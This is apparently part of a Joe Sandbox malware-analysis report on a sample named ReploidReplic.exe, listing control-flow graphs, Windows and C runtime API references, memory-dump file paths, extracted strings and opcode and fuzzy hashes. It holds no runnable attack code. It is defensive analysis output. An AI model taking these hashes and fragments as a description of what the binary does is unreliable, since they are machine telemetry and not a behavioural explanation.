                                                                                    control_flow_graph 1778 6ce10de0-6ce10e31 call 6ce19a70 call 6ce10da0 call 6ce11227 1785 6ce10e33-6ce10e45 1778->1785 1786 6ce10e8d-6ce10e90 1778->1786 1787 6ce10eb0-6ce10eb9 1785->1787 1789 6ce10e47-6ce10e5e 1785->1789 1786->1787 1788 6ce10e92-6ce10e9f call 6ce11210 1786->1788 1794 6ce10ea4-6ce10ead call 6ce10da0 1788->1794 1791 6ce10e60-6ce10e6e call 6ce111b0 1789->1791 1792 6ce10e74 1789->1792 1801 6ce10e70 1791->1801 1802 6ce10e84-6ce10e8b 1791->1802 1793 6ce10e77-6ce10e7c 1792->1793 1793->1789 1796 6ce10e7e-6ce10e80 1793->1796 1794->1787 1796->1787 1799 6ce10e82 1796->1799 1799->1794 1803 6ce10e72 1801->1803 1804 6ce10eba-6ce10ec3 1801->1804 1802->1794 1803->1793 1805 6ce10ec5-6ce10ecc 1804->1805 1806 6ce10efd-6ce10f0d call 6ce111f0 1804->1806 1805->1806 1808 6ce10ece-6ce10edd call 6ce19910 1805->1808 1812 6ce10f21-6ce10f3d call 6ce10da0 call 6ce111d0 1806->1812 1813 6ce10f0f-6ce10f1e call 6ce11210 1806->1813 1814 6ce10efa 1808->1814 1815 6ce10edf-6ce10ef7 1808->1815 1813->1812 1814->1806 1815->1814
                                                                                    APIs
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 6CE10E17
                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 6CE10E1F
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 6CE10EA8
                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 6CE10ED3
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 6CE10F28
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                    • String ID: csm
                                                                                    • API String ID: 1170836740-1018135373
                                                                                    • Opcode ID: 220c8300dbcf9cbfd4ce64dbd52b4b050515dff95b2260e096de9253dedf89c1
                                                                                    • Instruction ID: 0bb3dda64619191e067fd81157adfb0ff28f9d48b7b29e74238f09f3aa8c2fae
                                                                                    • Opcode Fuzzy Hash: 220c8300dbcf9cbfd4ce64dbd52b4b050515dff95b2260e096de9253dedf89c1
                                                                                    • Instruction Fuzzy Hash: 24417234A082489BCF00DF69C840A9EBBB5BF4532CF248159E8149BF51D735EA39CB91
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: =9l$C:\Users\user\Desktop\ReploidReplic.exe
                                                                                    • API String ID: 0-2713256572
                                                                                    • Opcode ID: f622efee61996c44df705aaeb71bf5c835a4d0d39520308a3fbc84be1d49034d
                                                                                    • Instruction ID: a52895218e9e317ffcd1791746d1dfeb8d3d682f599735c658a3505030ddc689
                                                                                    • Opcode Fuzzy Hash: f622efee61996c44df705aaeb71bf5c835a4d0d39520308a3fbc84be1d49034d
                                                                                    • Instruction Fuzzy Hash: DC21BE7160C209AFDB109F668C8599B77BEAF0236C7208629F52597F80E725DC618BA0
                                                                                    APIs
                                                                                      • Part of subcall function 6CE176BE: _free.LIBCMT ref: 6CE176E3
                                                                                    • _free.LIBCMT ref: 6CE17744
                                                                                      • Part of subcall function 6CE12F43: HeapFree.KERNEL32(00000000,00000000,?,6CE1217C), ref: 6CE12F59
                                                                                      • Part of subcall function 6CE12F43: GetLastError.KERNEL32(?,?,6CE1217C), ref: 6CE12F6B
                                                                                    • _free.LIBCMT ref: 6CE1774F
                                                                                    • _free.LIBCMT ref: 6CE1775A
                                                                                    • _free.LIBCMT ref: 6CE177AE
                                                                                    • _free.LIBCMT ref: 6CE177B9
                                                                                    • _free.LIBCMT ref: 6CE177C4
                                                                                    • _free.LIBCMT ref: 6CE177CF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
                                                                                    • Instruction ID: b660124cc2a078d4e6001c4fb27cc70d9ea92bfc31646dafa0c89254809bc264
                                                                                    • Opcode Fuzzy Hash: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
                                                                                    • Instruction Fuzzy Hash: A2115771A48744A6D630ABB4CC06FC77BBCAF0AB04F70081DA29967E60DF75F6284761
                                                                                    APIs
                                                                                    • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6CE16857
                                                                                    • __fassign.LIBCMT ref: 6CE16A3C
                                                                                    • __fassign.LIBCMT ref: 6CE16A59
                                                                                    • WriteFile.KERNEL32(?,6CE14FF3,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CE16AA1
                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CE16AE1
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CE16B89
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                    • String ID:
                                                                                    • API String ID: 1735259414-0
                                                                                    • Opcode ID: ede11b3a96412a2e4763a373d4cfde641c933b3e6619da56bfe15775ce4ab58d
                                                                                    • Instruction ID: 92202b9fc34ba9fe8fc2bb4dc483d898a7361140b0e51e2b423bc525fc426d91
                                                                                    • Opcode Fuzzy Hash: ede11b3a96412a2e4763a373d4cfde641c933b3e6619da56bfe15775ce4ab58d
                                                                                    • Instruction Fuzzy Hash: 2BC18E71D052588FCF11CFA9C8809EDBBB9EF09318F28816AD855F7B41D731AA56CB60
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000001,?,6CE10F85,6CE100B0,6CE0FAC9,?,6CE0FD01,?,00000001,?,?,00000001,?,6CE1F120,0000000C,6CE0FDFA), ref: 6CE112C5
                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CE112D3
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CE112EC
                                                                                    • SetLastError.KERNEL32(00000000,6CE0FD01,?,00000001,?,?,00000001,?,6CE1F120,0000000C,6CE0FDFA,?,00000001,?), ref: 6CE1133E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                    • String ID:
                                                                                    • API String ID: 3852720340-0
                                                                                    • Opcode ID: 3e9acddee74d7f824c4e9ebaa1fed77c4561fef263cc2b183d0d10a70e80cf0f
                                                                                    • Instruction ID: 86814117c73331e282757b3d005d31cd9d5160de2e13a5785e43ea6b4b22d24f
                                                                                    • Opcode Fuzzy Hash: 3e9acddee74d7f824c4e9ebaa1fed77c4561fef263cc2b183d0d10a70e80cf0f
                                                                                    • Instruction Fuzzy Hash: B201D83261D6515EDA041DF65C989AB27F8DB2767C730032DF12081FD0EF62C879A1C4
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,6CE114F4,00000000,?,00000001,00000000,?,6CE1156B,00000001,FlsFree,6CE1AD3C,FlsFree,00000000), ref: 6CE114C3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary
                                                                                    • String ID: api-ms-
                                                                                    • API String ID: 3664257935-2084034818
                                                                                    • Opcode ID: e086fef3256b1475399eb1cb8d050facbc1cb516fdeecdb550c8ddb7ab831362
                                                                                    • Instruction ID: 91ecc762deb054dc248bf9061403392773877a5b6c351ee0570e17d47535d956
                                                                                    • Opcode Fuzzy Hash: e086fef3256b1475399eb1cb8d050facbc1cb516fdeecdb550c8ddb7ab831362
                                                                                    • Instruction Fuzzy Hash: C811A731F89671ABDF128E9A8C41B5933B8AF13B78F350210E912E7F80D760E92486D5
                                                                                    APIs
                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CE11A9C,?,?,6CE11A64,?,00000001,?), ref: 6CE11AFF
                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CE11B12
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,6CE11A9C,?,?,6CE11A64,?,00000001,?), ref: 6CE11B35
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                    • API String ID: 4061214504-1276376045
                                                                                    • Opcode ID: 4ded4039318ea912d92fa5ab58e38e8f222523a349cd7a3e2fa7c0c161969184
                                                                                    • Instruction ID: 3ae7f34c32b1ef1e7e6c80a99ff476a04f094ec2229e1704eab504ca8752ed89
                                                                                    • Opcode Fuzzy Hash: 4ded4039318ea912d92fa5ab58e38e8f222523a349cd7a3e2fa7c0c161969184
                                                                                    • Instruction Fuzzy Hash: FCF01C35645118FFDF01AF90CD0AFAE7A79EB4576AF200064E401A2A60DB34CF28DB91
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1888184679.0000000000802000.00000040.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1888167525.0000000000800000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1888299409.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_800000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 6099$W$W~$uFZ\$ujux$xwva
                                                                                    • API String ID: 0-1122162066
                                                                                    • Opcode ID: 15c4e4cecf071b8b150356ab682e2cd82f1f04a1af7e387fedc85b01e833c0b9
                                                                                    • Instruction ID: 4922c34d77d76b5324cd7cbaf8368534568368abad9e8e2abd3bcda200382dcd
                                                                                    • Opcode Fuzzy Hash: 15c4e4cecf071b8b150356ab682e2cd82f1f04a1af7e387fedc85b01e833c0b9
                                                                                    • Instruction Fuzzy Hash: 0F81CAB410D3C18BD3358F2994A17EBBBE1EF96344F28896CD4C98B392DB7984458B53
                                                                                    APIs
                                                                                    • __alloca_probe_16.LIBCMT ref: 6CE1618B
                                                                                    • __alloca_probe_16.LIBCMT ref: 6CE16251
                                                                                    • __freea.LIBCMT ref: 6CE162BD
                                                                                      • Part of subcall function 6CE152BC: HeapAlloc.KERNEL32(00000000,6CE14FF3,6CE14FF3,?,6CE13CF3,00000220,?,6CE14FF3,?,?,?,?,6CE17111,00000001,?,?), ref: 6CE152EE
                                                                                    • __freea.LIBCMT ref: 6CE162C6
                                                                                    • __freea.LIBCMT ref: 6CE162E9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1096550386-0
                                                                                    • Opcode ID: cb5ae936651f66330b2f9404ebe471ab43c46db693f9c7de207559d4f46bbdb7
                                                                                    • Instruction ID: a9f2864c451503db0d575dcfc966c86aec3275bb51f6b25e597e070d510d981a
                                                                                    • Opcode Fuzzy Hash: cb5ae936651f66330b2f9404ebe471ab43c46db693f9c7de207559d4f46bbdb7
                                                                                    • Instruction Fuzzy Hash: CA517D72609616ABEB118E648C40EEB36BDEB4576CF354529F814EBF40E734D825C6A0
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 6CE1766D
                                                                                      • Part of subcall function 6CE12F43: HeapFree.KERNEL32(00000000,00000000,?,6CE1217C), ref: 6CE12F59
                                                                                      • Part of subcall function 6CE12F43: GetLastError.KERNEL32(?,?,6CE1217C), ref: 6CE12F6B
                                                                                    • _free.LIBCMT ref: 6CE1767F
                                                                                    • _free.LIBCMT ref: 6CE17691
                                                                                    • _free.LIBCMT ref: 6CE176A3
                                                                                    • _free.LIBCMT ref: 6CE176B5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: e54c876e835ebec1d4355451635fe912b5b4c1b8043d219a2d7bc9b3e35a3ca7
                                                                                    • Instruction ID: e03ac2333ef9115f0b43df26a1a67cd64235da68214068516553b9fede584cc6
                                                                                    • Opcode Fuzzy Hash: e54c876e835ebec1d4355451635fe912b5b4c1b8043d219a2d7bc9b3e35a3ca7
                                                                                    • Instruction Fuzzy Hash: D2F0F431A1D6445B8720DB69D886C6777F9EB0661C7700849F069D7F50D770F9904BE4
                                                                                    APIs
                                                                                      • Part of subcall function 6CE1680F: GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6CE16857
                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,6CE14FF3,?,00000000,00000000,6CE1F360,0000002C,6CE15064,?), ref: 6CE171C2
                                                                                    • GetLastError.KERNEL32 ref: 6CE171CC
                                                                                    • __dosmaperr.LIBCMT ref: 6CE1720B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConsoleErrorFileLastOutputWrite__dosmaperr
                                                                                    • String ID: dPl
                                                                                    • API String ID: 910155933-1338324705
                                                                                    • Opcode ID: 7f53edfc60aad7fd3067ee4b8ba5f54dab779befb45263865c9141e856fe102a
                                                                                    • Instruction ID: a355d2d1aa85668534830b9be07bafef731f568c8f321266b6f7050263efa493
                                                                                    • Opcode Fuzzy Hash: 7f53edfc60aad7fd3067ee4b8ba5f54dab779befb45263865c9141e856fe102a
                                                                                    • Instruction Fuzzy Hash: 9A51D4B2A48249ABDB018FA4C804FDE7B79EF4772CF340049E410A7F51D7759AA6C760
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @"$C:\Users\user\Desktop\ReploidReplic.exe
                                                                                    • API String ID: 0-3150779394
                                                                                    • Opcode ID: 475c0e7483bd20db421576963b0fca3b38f16ac9fc8246dd2852ee65e04544fd
                                                                                    • Instruction ID: 57a5a3f499b3d2bf661e1b22edb15b1cad7b4ab5a7f7326c6682ae043ba8c725
                                                                                    • Opcode Fuzzy Hash: 475c0e7483bd20db421576963b0fca3b38f16ac9fc8246dd2852ee65e04544fd
                                                                                    • Instruction Fuzzy Hash: 2E416471F08214AFDB15DBDAD88099FBBF8EB96358B30006AE404A7F50E771DA65CB50
                                                                                    APIs
                                                                                      • Part of subcall function 6CE13669: _free.LIBCMT ref: 6CE13677
                                                                                      • Part of subcall function 6CE1423D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,6CE162B3,?,00000000,00000000), ref: 6CE142E9
                                                                                    • GetLastError.KERNEL32 ref: 6CE130AF
                                                                                    • __dosmaperr.LIBCMT ref: 6CE130B6
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6CE130F5
                                                                                    • __dosmaperr.LIBCMT ref: 6CE130FC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                    • String ID:
                                                                                    • API String ID: 167067550-0
                                                                                    • Opcode ID: f5681213397d97c199b071df0d25b9c426e7072eef19dd5e3e5feb12b0b33629
                                                                                    • Instruction ID: 2997fff29fa07bbc0618b087fa6dad3a7287d3d3383dc43eaedeced8cb4e8e20
                                                                                    • Opcode Fuzzy Hash: f5681213397d97c199b071df0d25b9c426e7072eef19dd5e3e5feb12b0b33629
                                                                                    • Instruction Fuzzy Hash: 0D21B2B170C605AF9B109F668C8089BB7BDAF0537C724861DE82993F50D731DC618B90
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,?,6CE16C57,?,00000001,6CE15064,?,6CE17111,00000001,?,?,?,6CE14FF3,?,00000000), ref: 6CE1294C
                                                                                    • _free.LIBCMT ref: 6CE129A9
                                                                                    • _free.LIBCMT ref: 6CE129DF
                                                                                    • SetLastError.KERNEL32(00000000,00000013,000000FF,?,6CE17111,00000001,?,?,?,6CE14FF3,?,00000000,00000000,6CE1F360,0000002C,6CE15064), ref: 6CE129EA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast_free
                                                                                    • String ID:
                                                                                    • API String ID: 2283115069-0
                                                                                    • Opcode ID: 88a57577bf326954587d6f73e1b63adbe4ac763113474f3d6245830ad029007d
                                                                                    • Instruction ID: 2e933f3681a7ad20dc9050bd4e1d4a60b1b96f685ad68ea2c22f118905baef46
                                                                                    • Opcode Fuzzy Hash: 88a57577bf326954587d6f73e1b63adbe4ac763113474f3d6245830ad029007d
                                                                                    • Instruction Fuzzy Hash: 0E11C67370C1046BDA41667E9C89EAB27B9ABE33BCB34022DF52492FD1EB6588395110
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,00000001,6CE12ED8,6CE12F69,?,?,6CE1217C), ref: 6CE12AA3
                                                                                    • _free.LIBCMT ref: 6CE12B00
                                                                                    • _free.LIBCMT ref: 6CE12B36
                                                                                    • SetLastError.KERNEL32(00000000,00000013,000000FF,?,00000001,6CE12ED8,6CE12F69,?,?,6CE1217C), ref: 6CE12B41
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast_free
                                                                                    • String ID:
                                                                                    • API String ID: 2283115069-0
                                                                                    • Opcode ID: 3c525a1c2ed809f81cc66b8e4d4537864add6edf4ff6b78d606f48f13e59cb95
                                                                                    • Instruction ID: a51f5dab65a9d841adcd3ebbf60ea8d50a404b25f3440285002a33c8f17219d4
                                                                                    • Opcode Fuzzy Hash: 3c525a1c2ed809f81cc66b8e4d4537864add6edf4ff6b78d606f48f13e59cb95
                                                                                    • Instruction Fuzzy Hash: B9112932B0C1012FDA116A755C88D6B23B99BD33BCB35022DF52493FD0DB7189395120
                                                                                    APIs
                                                                                    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6CE17900,?,00000001,?,00000001,?,6CE16BE6,?,?,00000001), ref: 6CE17EBD
                                                                                    • GetLastError.KERNEL32(?,6CE17900,?,00000001,?,00000001,?,6CE16BE6,?,?,00000001,?,00000001,?,6CE17132,6CE14FF3), ref: 6CE17EC9
                                                                                      • Part of subcall function 6CE17E8F: CloseHandle.KERNEL32(FFFFFFFE,6CE17ED9,?,6CE17900,?,00000001,?,00000001,?,6CE16BE6,?,?,00000001,?,00000001), ref: 6CE17E9F
                                                                                    • ___initconout.LIBCMT ref: 6CE17ED9
                                                                                      • Part of subcall function 6CE17E51: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CE17E80,6CE178ED,00000001,?,6CE16BE6,?,?,00000001,?), ref: 6CE17E64
                                                                                    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6CE17900,?,00000001,?,00000001,?,6CE16BE6,?,?,00000001,?), ref: 6CE17EEE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
